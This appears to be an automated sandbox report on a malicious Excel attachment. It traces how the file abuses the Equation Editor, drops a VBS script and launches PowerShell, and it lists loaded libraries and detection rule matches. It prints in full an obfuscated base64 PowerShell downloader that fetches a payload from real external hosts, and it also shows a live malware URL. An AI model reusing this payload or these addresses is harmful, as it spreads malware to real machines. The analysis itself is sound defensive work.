reaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDg
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: SHREE GANESH BOOK SERVICES-347274.xlsOLE indicator, VBA macros: true
Source: SHREE GANESH BOOK SERVICES-347274.xlsStream path 'MBD00027435/\x1Ole' : http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC91G\VJM2nR{aLwrqs7S4x$\;2Wl-]jhCuRWpScO6YQWLjmx3PBwX9sedJG9BV84GrNVy9965D1PZFoN0a5jvmORa9vRTKTdFo1bw6MAhR3pZlgNBkXM9BRJDxicdCzswMC\%!yZ}6OCk
Source: 6D330000.0.drStream path 'MBD00027435/\x1Ole' : http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doCyX;H,]'cFo__
Source: ~DF339C70062F0AA3F9.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{67551F0E-90CB-489F-80A1-F0E70E1E7186}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: Process Memory Space: powershell.exe PID: 3476, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3636, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engineClassification label: mal100.spre.troj.expl.evad.winXLS@18/49@3/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7148.tmpJump to behavior
Source: SHREE GANESH BOOK SERVICES-347274.xlsOLE indicator, Workbook stream: true
Source: 6D330000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................f..........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................u..........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.4.6..............................s....................&.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................v.......................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................(..........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................<..........................s............................................Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................K..........................s............................................Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SHREE GANESH BOOK SERVICES-347274.xlsVirustotal: Detection: 24%
Source: SHREE GANESH BOOK SERVICES-347274.xlsReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDg
